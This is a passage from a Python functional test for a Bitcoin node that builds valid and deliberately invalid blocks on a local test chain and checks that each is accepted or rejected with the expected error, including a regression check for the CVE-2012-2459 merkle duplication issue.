        self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer")
        self.move_tip(5)
        b10 = self.next_block(10, spend=out[3])
        self.sync_blocks([b10], False)

        b11 = self.next_block(11, spend=out[4], additional_coinbase_value=1)
        self.sync_blocks([b11], False, 16, b'bad-cb-amount', reconnect=True)

        # Try again, but with a valid fork first
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b14 (5)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer (on a forked chain)")
        self.move_tip(5)
        b12 = self.next_block(12, spend=out[3])
        self.save_spendable_output()
        b13 = self.next_block(13, spend=out[4])
        self.save_spendable_output()
        b14 = self.next_block(14, spend=out[5], additional_coinbase_value=1)
        self.sync_blocks([b12, b13, b14], False, 16, b'bad-cb-amount', reconnect=True)

        # New tip should be b13.
        assert_equal(node.getbestblockhash(), b13.hash)

        # Add a block with MAX_BLOCK_SIGOPS and one with one more sigop
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5) -> b16 (6)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Accept a block with lots of checksigs")
        lots_of_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS - 1))
        self.move_tip(13)
        b15 = self.next_block(15, spend=out[5], script=lots_of_checksigs)
        self.save_spendable_output()
        self.sync_blocks([b15], True)

        self.log.info("Reject a block with too many checksigs")
        too_many_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS))
        b16 = self.next_block(16, spend=out[6], script=too_many_checksigs)
        self.sync_blocks([b16], False, 16, b'bad-blk-sigops', reconnect=True)

        # Attempt to spend a transaction created on a different fork
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5) -> b17 (b3.vtx[1])
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block with a spend from a re-org'ed out tx")
        self.move_tip(15)
        b17 = self.next_block(17, spend=txout_b3)
        self.sync_blocks([b17], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # Attempt to spend a transaction created on a different fork (on a fork this time)
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5)
        #                                                                \-> b18 (b3.vtx[1]) -> b19 (6)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block with a spend from a re-org'ed out tx (on a forked chain)")
        self.move_tip(13)
        b18 = self.next_block(18, spend=txout_b3)
        self.sync_blocks([b18], False)

        b19 = self.next_block(19, spend=out[6])
        self.sync_blocks([b19], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # Attempt to spend a coinbase at depth too low
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5) -> b20 (7)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block spending an immature coinbase.")
        self.move_tip(15)
        b20 = self.next_block(20, spend=out[7])
        self.sync_blocks([b20], False, 16, b'bad-txns-premature-spend-of-coinbase')

        # Attempt to spend a coinbase at depth too low (on a fork this time)
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5)
        #                                                                \-> b21 (6) -> b22 (5)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block spending an immature coinbase (on a forked chain)")
        self.move_tip(13)
        b21 = self.next_block(21, spend=out[6])
        self.sync_blocks([b21], False)

        b22 = self.next_block(22, spend=out[5])
        self.sync_blocks([b22], False, 16, b'bad-txns-premature-spend-of-coinbase')

        # Create a block on either side of MAX_BLOCK_BASE_SIZE and make sure it's accepted/rejected
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6)
        #                                                                           \-> b24 (6) -> b25 (7)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Accept a block of size MAX_BLOCK_BASE_SIZE")
        self.move_tip(15)
        b23 = self.next_block(23, spend=out[6])
        tx = CTransaction()
        script_length = MAX_BLOCK_BASE_SIZE - len(b23.serialize()) - 69
        script_output = CScript([b'\x00' * script_length])
        tx.vout.append(CTxOut(0, script_output))
        tx.vin.append(CTxIn(COutPoint(b23.vtx[1].sha256, 0)))
        b23 = self.update_block(23, [tx])
        # Make sure the math above worked out to produce a max-sized block
        assert_equal(len(b23.serialize()), MAX_BLOCK_BASE_SIZE)
        self.sync_blocks([b23], True)
        self.save_spendable_output()

        self.log.info("Reject a block of size MAX_BLOCK_BASE_SIZE + 1")
        self.move_tip(15)
        b24 = self.next_block(24, spend=out[6])
        script_length = MAX_BLOCK_BASE_SIZE - len(b24.serialize()) - 69
        script_output = CScript([b'\x00' * (script_length + 1)])
        tx.vout = [CTxOut(0, script_output)]
        b24 = self.update_block(24, [tx])
        assert_equal(len(b24.serialize()), MAX_BLOCK_BASE_SIZE + 1)
        self.sync_blocks([b24], False, 16, b'bad-blk-length', reconnect=True)

        b25 = self.next_block(25, spend=out[7])
        self.sync_blocks([b25], False)

        # Create blocks with a coinbase input script size out of range
        #     genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6  (3)
        #                                          \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7)
        #                                                                           \-> ... (6) -> ... (7)
        #                      \-> b3 (1) -> b4 (2)
        self.log.info("Reject a block with coinbase input script size out of range")
        self.move_tip(15)
        b26 = self.next_block(26, spend=out[6])
        b26.vtx[0].vin[0].scriptSig = b'\x00'
        b26.vtx[0].rehash()
        # update_block causes the merkle root to get updated, even with no new
        # transactions, and updates the required state.
        b26 = self.update_block(26, [])
        self.sync_blocks([b26], False, 16, b'bad-cb-length', reconnect=True)

        # Extend the b26 chain to make sure bitcoind isn't accepting b26
        b27 = self.next_block(27, spend=out[7])
        self.sync_blocks([b27], False)

        # Now try a too-large-coinbase script
        self.move_tip(15)
        b28 = self.next_block(28, spend=out[6])
        b28.vtx[0].vin[0].scriptSig = b'\x00' * 101
        b28.vtx[0].rehash()
        b28 = self.update_block(28, [])
        self.sync_blocks([b28], False, 16, b'bad-cb-length', reconnect=True)

        # Extend the b28 chain to make sure bitcoind isn't accepting b28
        b29 = self.next_block(29, spend=out[7])
        self.sync_blocks([b29], False)

        # b30 has a max-sized coinbase scriptSig.
        self.move_tip(23)
        b30 = self.next_block(30)
        b30.vtx[0].vin[0].scriptSig = b'\x00' * 100
        b30.vtx[0].rehash()
        b30 = self.update_block(30, [])
        self.sync_blocks([b30], True)
        self.save_spendable_output()

        # b31 - b35 - check sigops of OP_CHECKMULTISIG / OP_CHECKMULTISIGVERIFY / OP_CHECKSIGVERIFY
        #
        #     genesis -> ... -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
        #                                                                \-> b36 (11)
        #                                                    \-> b34 (10)
        #                                         \-> b32 (9)
        #

        # MULTISIG: each op code counts as 20 sigops.  To create the edge case, pack another 19 sigops at the end.
        self.log.info("Accept a block with the max number of OP_CHECKMULTISIG sigops")
        lots_of_multisigs = CScript([OP_CHECKMULTISIG] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
        b31 = self.next_block(31, spend=out[8], script=lots_of_multisigs)
        assert_equal(get_legacy_sigopcount_block(b31), MAX_BLOCK_SIGOPS)
        self.sync_blocks([b31], True)
        self.save_spendable_output()

        # this goes over the limit because the coinbase has one sigop
        self.log.info("Reject a block with too many OP_CHECKMULTISIG sigops")
        too_many_multisigs = CScript([OP_CHECKMULTISIG] * (MAX_BLOCK_SIGOPS // 20))
        b32 = self.next_block(32, spend=out[9], script=too_many_multisigs)
        assert_equal(get_legacy_sigopcount_block(b32), MAX_BLOCK_SIGOPS + 1)
        self.sync_blocks([b32], False, 16, b'bad-blk-sigops', reconnect=True)

        # CHECKMULTISIGVERIFY
        self.log.info("Accept a block with the max number of OP_CHECKMULTISIGVERIFY sigops")
        self.move_tip(31)
        lots_of_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
        b33 = self.next_block(33, spend=out[9], script=lots_of_multisigs)
        self.sync_blocks([b33], True)
        self.save_spendable_output()

        self.log.info("Reject a block with too many OP_CHECKMULTISIGVERIFY sigops")
        too_many_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * (MAX_BLOCK_SIGOPS // 20))
        b34 = self.next_block(34, spend=out[10], script=too_many_multisigs)
        self.sync_blocks([b34], False, 16, b'bad-blk-sigops', reconnect=True)

        # CHECKSIGVERIFY
        self.log.info("Accept a block with the max number of OP_CHECKSIGVERIFY sigops")
        self.move_tip(33)
        lots_of_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS - 1))
        b35 = self.next_block(35, spend=out[10], script=lots_of_checksigs)
        self.sync_blocks([b35], True)
        self.save_spendable_output()

        self.log.info("Reject a block with too many OP_CHECKSIGVERIFY sigops")
        too_many_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS))
        b36 = self.next_block(36, spend=out[11], script=too_many_checksigs)
        self.sync_blocks([b36], False, 16, b'bad-blk-sigops', reconnect=True)

        # Check spending of a transaction in a block which failed to connect
        #
        # b6  (3)
        # b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
        #                                                                                     \-> b37 (11)
        #                                                                                     \-> b38 (11/37)
        #

        # save 37's spendable output, but then double-spend out11 to invalidate the block
        self.log.info("Reject a block spending transaction from a block which failed to connect")
        self.move_tip(35)
        b37 = self.next_block(37, spend=out[11])
        txout_b37 = b37.vtx[1]
        tx = self.create_and_sign_transaction(out[11], 0)
        b37 = self.update_block(37, [tx])
        self.sync_blocks([b37], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # attempt to spend b37's first non-coinbase tx, at which point b37 was still considered valid
        self.move_tip(35)
        b38 = self.next_block(38, spend=txout_b37)
        self.sync_blocks([b38], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # Check P2SH SigOp counting
        #
        #
        #   13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b41 (12)
        #                                                                                        \-> b40 (12)
        #
        # b39 - create some P2SH outputs that will require 6 sigops to spend:
        #
        #           redeem_script = COINBASE_PUBKEY, (OP_2DUP+OP_CHECKSIGVERIFY) * 5, OP_CHECKSIG
        #           p2sh_script = OP_HASH160, ripemd160(sha256(script)), OP_EQUAL
        #
        self.log.info("Check P2SH SIGOPS are correctly counted")
        self.move_tip(35)
        b39 = self.next_block(39)
        b39_outputs = 0
        b39_sigops_per_output = 6

        # Build the redeem script, hash it, use hash to create the p2sh script
        redeem_script = CScript([self.coinbase_pubkey] + [OP_2DUP, OP_CHECKSIGVERIFY] * 5 + [OP_CHECKSIG])
        redeem_script_hash = hash160(redeem_script)
        p2sh_script = CScript([OP_HASH160, redeem_script_hash, OP_EQUAL])

        # Create a transaction that spends one satoshi to the p2sh_script, the rest to OP_TRUE
        # This must be signed because it is spending a coinbase
        spend = out[11]
        tx = self.create_tx(spend, 0, 1, p2sh_script)
        tx.vout.append(CTxOut(spend.vout[0].nValue - 1, CScript([OP_TRUE])))
        self.sign_tx(tx, spend)
        tx.rehash()
        b39 = self.update_block(39, [tx])
        b39_outputs += 1

        # Until block is full, add tx's with 1 satoshi to p2sh_script, the rest to OP_TRUE
        tx_new = None
        tx_last = tx
        total_size = len(b39.serialize())
        while(total_size < MAX_BLOCK_BASE_SIZE):
            tx_new = self.create_tx(tx_last, 1, 1, p2sh_script)
            tx_new.vout.append(CTxOut(tx_last.vout[1].nValue - 1, CScript([OP_TRUE])))
            tx_new.rehash()
            total_size += len(tx_new.serialize())
            if total_size >= MAX_BLOCK_BASE_SIZE:
                break
            b39.vtx.append(tx_new)  # add tx to block
            tx_last = tx_new
            b39_outputs += 1

        b39 = self.update_block(39, [])
        self.sync_blocks([b39], True)
        self.save_spendable_output()

        # Test sigops in P2SH redeem scripts
        #
        # b40 creates 3333 tx's spending the 6-sigop P2SH outputs from b39 for a total of 19998 sigops.
        # The first tx has one sigop and then at the end we add 2 more to put us just over the max.
        #
        # b41 does the same, less one, so it has the maximum sigops permitted.
        #
        self.log.info("Reject a block with too many P2SH sigops")
        self.move_tip(39)
        b40 = self.next_block(40, spend=out[12])
        sigops = get_legacy_sigopcount_block(b40)
        numTxes = (MAX_BLOCK_SIGOPS - sigops) // b39_sigops_per_output
        assert_equal(numTxes <= b39_outputs, True)

        lastOutpoint = COutPoint(b40.vtx[1].sha256, 0)
        new_txs = []
        for i in range(1, numTxes + 1):
            tx = CTransaction()
            tx.vout.append(CTxOut(1, CScript([OP_TRUE])))
            tx.vin.append(CTxIn(lastOutpoint, b''))
            # second input is corresponding P2SH output from b39
            tx.vin.append(CTxIn(COutPoint(b39.vtx[i].sha256, 0), b''))
            # Note: must pass the redeem_script (not p2sh_script) to the signature hash function
            (sighash, err) = SignatureHash(redeem_script, tx, 1, SIGHASH_ALL)
            sig = self.coinbase_key.sign(sighash) + bytes(bytearray([SIGHASH_ALL]))
            scriptSig = CScript([sig, redeem_script])

            tx.vin[1].scriptSig = scriptSig
            tx.rehash()
            new_txs.append(tx)
            lastOutpoint = COutPoint(tx.sha256, 0)

        b40_sigops_to_fill = MAX_BLOCK_SIGOPS - (numTxes * b39_sigops_per_output + sigops) + 1
        tx = CTransaction()
        tx.vin.append(CTxIn(lastOutpoint, b''))
        tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b40_sigops_to_fill)))
        tx.rehash()
        new_txs.append(tx)
        self.update_block(40, new_txs)
        self.sync_blocks([b40], False, 16, b'bad-blk-sigops', reconnect=True)

        # same as b40, but one less sigop
        self.log.info("Accept a block with the max number of P2SH sigops")
        self.move_tip(39)
        b41 = self.next_block(41, spend=None)
        self.update_block(41, b40.vtx[1:-1])
        b41_sigops_to_fill = b40_sigops_to_fill - 1
        tx = CTransaction()
        tx.vin.append(CTxIn(lastOutpoint, b''))
        tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b41_sigops_to_fill)))
        tx.rehash()
        self.update_block(41, [tx])
        self.sync_blocks([b41], True)

        # Fork off of b39 to create a constant base again
        #
        # b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13)
        #                                                                  \-> b41 (12)
        #
        self.move_tip(39)
        b42 = self.next_block(42, spend=out[12])
        self.save_spendable_output()

        b43 = self.next_block(43, spend=out[13])
        self.save_spendable_output()
        self.sync_blocks([b42, b43], True)

        # Test a number of really invalid scenarios
        #
        #  -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b44 (14)
        #                                                                                   \-> ??? (15)

        # The next few blocks are going to be created "by hand" since they'll do funky things, such as having
        # the first transaction be non-coinbase, etc.  The purpose of b44 is to make sure this works.
        self.log.info("Build block 44 manually")
        height = self.block_heights[self.tip.sha256] + 1
        coinbase = create_coinbase(height, self.coinbase_pubkey)
        b44 = CBlock()
        b44.nTime = self.tip.nTime + 1
        b44.hashPrevBlock = self.tip.sha256
        b44.nBits = 0x207fffff
        b44.vtx.append(coinbase)
        b44.hashMerkleRoot = b44.calc_merkle_root()
        b44.solve()
        self.tip = b44
        self.block_heights[b44.sha256] = height
        self.blocks[44] = b44
        self.sync_blocks([b44], True)

        self.log.info("Reject a block with a non-coinbase as the first tx")
        non_coinbase = self.create_tx(out[15], 0, 1)
        b45 = CBlock()
        b45.nTime = self.tip.nTime + 1
        b45.hashPrevBlock = self.tip.sha256
        b45.nBits = 0x207fffff
        b45.vtx.append(non_coinbase)
        b45.hashMerkleRoot = b45.calc_merkle_root()
        b45.calc_sha256()
        b45.solve()
        self.block_heights[b45.sha256] = self.block_heights[self.tip.sha256] + 1
        self.tip = b45
        self.blocks[45] = b45
        self.sync_blocks([b45], False, 16, b'bad-cb-missing', reconnect=True)

        self.log.info("Reject a block with no transactions")
        self.move_tip(44)
        b46 = CBlock()
        b46.nTime = b44.nTime + 1
        b46.hashPrevBlock = b44.sha256
        b46.nBits = 0x207fffff
        b46.vtx = []
        b46.hashMerkleRoot = 0
        b46.solve()
        self.block_heights[b46.sha256] = self.block_heights[b44.sha256] + 1
        self.tip = b46
        assert 46 not in self.blocks
        self.blocks[46] = b46
        self.sync_blocks([b46], False, 16, b'bad-blk-length', reconnect=True)

        self.log.info("Reject a block with invalid work")
        self.move_tip(44)
        b47 = self.next_block(47, solve=False)
        target = uint256_from_compact(b47.nBits)
        while b47.sha256 < target:
            b47.nNonce += 1
            b47.rehash()
        self.sync_blocks([b47], False, request_block=False)

        self.log.info("Reject a block with a timestamp >2 hours in the future")
        self.move_tip(44)
        b48 = self.next_block(48, solve=False)
        b48.nTime = int(time.time()) + 60 * 60 * 3
        b48.solve()
        self.sync_blocks([b48], False, request_block=False)

        self.log.info("Reject a block with invalid merkle hash")
        self.move_tip(44)
        b49 = self.next_block(49)
        b49.hashMerkleRoot += 1
        b49.solve()
        self.sync_blocks([b49], False, 16, b'bad-txnmrklroot', reconnect=True)

        self.log.info("Reject a block with incorrect POW limit")
        self.move_tip(44)
        b50 = self.next_block(50)
        b50.nBits = b50.nBits - 1
        b50.solve()
        self.sync_blocks([b50], False, request_block=False, reconnect=True)

        self.log.info("Reject a block with two coinbase transactions")
        self.move_tip(44)
        b51 = self.next_block(51)
        cb2 = create_coinbase(51, self.coinbase_pubkey)
        b51 = self.update_block(51, [cb2])
        self.sync_blocks([b51], False, 16, b'bad-cb-multiple', reconnect=True)

        self.log.info("Reject a block with duplicate transactions")
        # Note: txns have to be in the right position in the merkle tree to trigger this error
        self.move_tip(44)
        b52 = self.next_block(52, spend=out[15])
        tx = self.create_tx(b52.vtx[1], 0, 1)
        b52 = self.update_block(52, [tx, tx])
        self.sync_blocks([b52], False, 16, b'bad-txns-duplicate', reconnect=True)

        # Test block timestamps
        #  -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15)
        #                                                                                   \-> b54 (15)
        #
        self.move_tip(43)
        b53 = self.next_block(53, spend=out[14])
        self.sync_blocks([b53], False)
        self.save_spendable_output()

        self.log.info("Reject a block with timestamp before MedianTimePast")
        b54 = self.next_block(54, spend=out[15])
        b54.nTime = b35.nTime - 1
        b54.solve()
        self.sync_blocks([b54], False, request_block=False)

        # valid timestamp
        self.move_tip(53)
        b55 = self.next_block(55, spend=out[15])
        b55.nTime = b35.nTime
        self.update_block(55, [])
        self.sync_blocks([b55], True)
        self.save_spendable_output()

        # Test Merkle tree malleability
        #
        # -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57p2 (16)
        #                                                \-> b57   (16)
        #                                                \-> b56p2 (16)
        #                                                \-> b56   (16)
        #
        # Merkle tree malleability (CVE-2012-2459): repeating sequences of transactions in a block without
        #                           affecting the merkle root of a block, while still invalidating it.
        #                           See:  src/consensus/merkle.h
        #
        #  b57 has three txns:  coinbase, tx, tx1.  The merkle root computation will duplicate tx.
        #  Result:  OK
        #
        #  b56 copies b57 but duplicates tx1 and does not recalculate the block hash.  So it has a valid merkle
        #  root but duplicate transactions.
        #  Result:  Fails
        #
        #  b57p2 has six transactions in its merkle tree:
        #       - coinbase, tx, tx1, tx2, tx3, tx4
        #  Merkle root calculation will duplicate as necessary.
        #  Result:  OK.
        #
        #  b56p2 copies b57p2 but adds both tx3 and tx4.  The purpose of the test is to make sure the code catches
        #  duplicate txns that are not next to one another with the "bad-txns-duplicate" error (which indicates
        #  that the error was caught early, avoiding a DOS vulnerability.)

        # b57 - a good block with 2 txs, don't submit until end
        self.move_tip(55)
        b57 = self.next_block(57)
        tx = self.create_and_sign_transaction(out[16], 1)
        tx1 = self.create_tx(tx, 0, 1)
        b57 = self.update_block(57, [tx, tx1])

        # b56 - copy b57, add a duplicate tx
        self.log.info("Reject a block with a duplicate transaction in the Merkle Tree (but with a valid Merkle Root)")
        self.move_tip(55)
        b56 = copy.deepcopy(b57)
        self.blocks[56] = b56
        assert_equal(len(b56.vtx), 3)
        b56 = self.update_block(56, [tx1])
        assert_equal(b56.hash, b57.hash)
        self.sync_blocks([b56], False, 16, b'bad-txns-duplicate', reconnect=True)

        # b57p2 - a good block with 6 tx'es, don't submit until end
        self.move_tip(55)
        b57p2 = self.next_block("57p2")
        tx = self.create_and_sign_transaction(out[16], 1)
        tx1 = self.create_tx(tx, 0, 1)
        tx2 = self.create_tx(tx1, 0, 1)
        tx3 = self.create_tx(tx2, 0, 1)
        tx4 = self.create_tx(tx3, 0, 1)
        b57p2 = self.update_block("57p2", [tx, tx1, tx2, tx3, tx4])

        # b56p2 - copy b57p2, duplicate two non-consecutive tx's
        self.log.info("Reject a block with two duplicate transactions in the Merkle Tree (but with a valid Merkle Root)")
        self.move_tip(55)
        b56p2 = copy.deepcopy(b57p2)
        self.blocks["b56p2"] = b56p2
        assert_equal(b56p2.hash, b57p2.hash)
        assert_equal(len(b56p2.vtx), 6)
        b56p2 = self.update_block("b56p2", [tx3, tx4])
        self.sync_blocks([b56p2], False, 16, b'bad-txns-duplicate', reconnect=True)

        self.move_tip("57p2")
        self.sync_blocks([b57p2], True)

        self.move_tip(57)
        self.sync_blocks([b57], False)  # The tip is not updated because 57p2 seen first
        self.save_spendable_output()

        # Test a few invalid tx types
        #
        # -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
        #                                                                                    \-> ??? (17)
        #

        # tx with prevout.n out of range
        self.log.info("Reject a block with a transaction with prevout.n out of range")
        self.move_tip(57)
        b58 = self.next_block(58, spend=out[17])
        tx = CTransaction()
        assert(len(out[17].vout) < 42)
        tx.vin.append(CTxIn(COutPoint(out[17].sha256, 42), CScript([OP_TRUE]), 0xffffffff))
        tx.vout.append(CTxOut(0, b""))
        tx.calc_sha256()
        b58 = self.update_block(58, [tx])
        self.sync_blocks([b58], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # tx with output value > input value
        self.log.info("Reject a block with a transaction with outputs > inputs")
        self.move_tip(57)
        b59 = self.next_block(59)
        tx = self.create_and_sign_transaction(out[17], 51 * COIN)
        b59 = self.update_block(59, [tx])
        self.sync_blocks([b59], False, 16, b'bad-txns-in-belowout', reconnect=True)

        # reset to good chain
        self.move_tip(57)
        b60 = self.next_block(60, spend=out[17])
        self.sync_blocks([b60], True)
        self.save_spendable_output()

        # Test BIP30
        #
        # -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
        #                                                                                    \-> b61 (18)
        #
        # Blocks are not allowed to contain a transaction whose id matches that of an earlier,
        # not-fully-spent transaction in the same chain. To test, make identical coinbases;
        # the second one should be rejected.
        #
        self.log.info("Reject a block with a transaction with a duplicate hash of a previous transaction (BIP30)")
        self.move_tip(60)
        b61 = self.next_block(61, spend=out[18])
        b61.vtx[0].vin[0].scriptSig = b60.vtx[0].vin[0].scriptSig  # Equalize the coinbases
        b61.vtx[0].rehash()
        b61 = self.update_block(61, [])
        assert_equal(b60.vtx[0].serialize(), b61.vtx[0].serialize())
        self.sync_blocks([b61], False, 16, b'bad-txns-BIP30', reconnect=True)

        # Test tx.isFinal is properly rejected (not an exhaustive tx.isFinal test, that should be in data-driven transaction tests)
        #
        #   -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
        #                                                                                     \-> b62 (18)
        #
        self.log.info("Reject a block with a transaction with a nonfinal locktime")
        self.move_tip(60)
        b62 = self.next_block(62)
        tx = CTransaction()
        tx.nLockTime = 0xffffffff  # this locktime is non-final
        tx.vin.append(CTxIn(COutPoint(out[18].sha256, 0)))  # don't set nSequence
        tx.vout.append(CTxOut(0, CScript([OP_TRUE])))
        assert(tx.vin[0].nSequence < 0xffffffff)
        tx.calc_sha256()
        b62 = self.update_block(62, [tx])
        self.sync_blocks([b62], False, 16, b'bad-txns-nonfinal')

        # Test a non-final coinbase is also rejected
        #
        #   -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
        #                                                                                     \-> b63 (-)
        #
        self.log.info("Reject a block with a coinbase transaction with a nonfinal locktime")
        self.move_tip(60)
        b63 = self.next_block(63)
        b63.vtx[0].nLockTime = 0xffffffff
        b63.vtx[0].vin[0].nSequence = 0xDEADBEEF
        b63.vtx[0].rehash()
        b63 = self.update_block(63, [])
        self.sync_blocks([b63], False, 16, b'bad-txns-nonfinal')

        #  This checks that a block with a bloated VARINT between the block_header and the array of tx such that
        #  the block is > MAX_BLOCK_BASE_SIZE with the bloated varint, but <= MAX_BLOCK_BASE_SIZE without the bloated varint,
        #  does not cause a subsequent, identical block with canonical encoding to be rejected.  The test does not
        #  care whether the bloated block is accepted or rejected; it only cares that the second block is accepted.
        #
        #  What matters is that the receiving node should not reject the bloated block, and then reject the canonical
        #  block on the basis that it's the same as an already-rejected block (which would be a consensus failure.)
        #
        #  -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18)
        #                                                                                        \
        #                                                                                         b64a (18)
        #  b64a is a bloated block (non-canonical varint)
        #  b64 is a good block (same as b64a but w/ canonical varint)
        #
        self.log.info("Accept a valid block even if a bloated version of the block has previously been sent")
        self.move_tip(60)
        regular_block = self.next_block("64a", spend=out[18])

        # make it a "broken_block," with non-canonical serialization
        b64a = CBrokenBlock(regular_block)
        b64a.initialize(regular_block)
        self.blocks["64a"] = b64a
        self.tip = b64a
        tx = CTransaction()

        # use canonical serialization to calculate size
        script_length = MAX_BLOCK_BASE_SIZE - len(b64a.normal_serialize()) - 69
        script_output = CScript([b'\x00' * script_length])
        tx.vout.append(CTxOut(0, script_output))
        tx.vin.append(CTxIn(COutPoint(b64a.vtx[1].sha256, 0)))
        b64a = self.update_block("64a", [tx])
        assert_equal(len(b64a.serialize()), MAX_BLOCK_BASE_SIZE + 8)
        self.sync_blocks([b64a], False, 1, b'error parsing message')

        # bitcoind doesn't disconnect us for sending a bloated block, but if we subsequently
        # resend the header message, it won't send us the getdata message again. Just
        # disconnect and reconnect and then call sync_blocks.
        # TODO: improve this test to be less dependent on P2P DOS behaviour.
        node.disconnect_p2ps()
        self.reconnect_p2p()

        self.move_tip(60)
        b64 = CBlock(b64a)
        b64.vtx = copy.deepcopy(b64a.vtx)
        assert_equal(b64.hash, b64a.hash)
        assert_equal(len(b64.serialize()), MAX_BLOCK_BASE_SIZE)
        self.blocks[64] = b64
        b64 = self.update_block(64, [])
        self.sync_blocks([b64], True)
        self.save_spendable_output()

        # Spend an output created in the block itself
        #
        # -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
        #
        self.log.info("Accept a block with a transaction spending an output created in the same block")
        self.move_tip(64)
        b65 = self.next_block(65)
        tx1 = self.create_and_sign_transaction(out[19], out[19].vout[0].nValue)
        tx2 = self.create_and_sign_transaction(tx1, 0)
        b65 = self.update_block(65, [tx1, tx2])
        self.sync_blocks([b65], True)
        self.save_spendable_output()

        # Attempt to spend an output created later in the same block
        #
        # -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
        #                                                                                    \-> b66 (20)
        self.log.info("Reject a block with a transaction spending an output created later in the same block")
        self.move_tip(65)
        b66 = self.next_block(66)
        tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
        tx2 = self.create_and_sign_transaction(tx1, 1)
        b66 = self.update_block(66, [tx2, tx1])
        self.sync_blocks([b66], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # Attempt to double-spend a transaction created in a block
        #
        # -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19)
        #                                                                                    \-> b67 (20)
        #
        #
        self.log.info("Reject a block with a transaction double spending a transaction creted in the same block")
        self.move_tip(65)
        b67 = self.next_block(67)
        tx1 = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue)
        tx2 = self.create_and_sign_transaction(tx1, 1)
        tx3 = self.create_and_sign_transaction(tx1, 2)
        b67 = self.update_block(67, [tx1, tx2, tx3])
        self.sync_blocks([b67], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        # More tests of block subsidy
        #
        # -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20)
        #                                                                                    \-> b68 (20)
        #
        # b68 - coinbase with an extra 10 satoshis,
        #       creates a tx that has 9 satoshis from out[20] go to fees
        #       this fails because the coinbase is trying to claim 1 satoshi too much in fees
        #
        # b69 - coinbase with extra 10 satoshis, and a tx that gives a 10 satoshi fee
        #       this succeeds
        #
        self.log.info("Reject a block trying to claim too much subsidy in the coinbase transaction")
        self.move_tip(65)
        b68 = self.next_block(68, additional_coinbase_value=10)
        tx = self.create_and_sign_transaction(out[20], out[20].vout[0].nValue - 9)
        b68 = self.update_block(68, [tx])
        self.sync_blocks([b68], False, 16, b'bad-cb-amount', reconnect=True)

        self.log.info("Accept a block claiming the correct subsidy in the coinbase transaction")
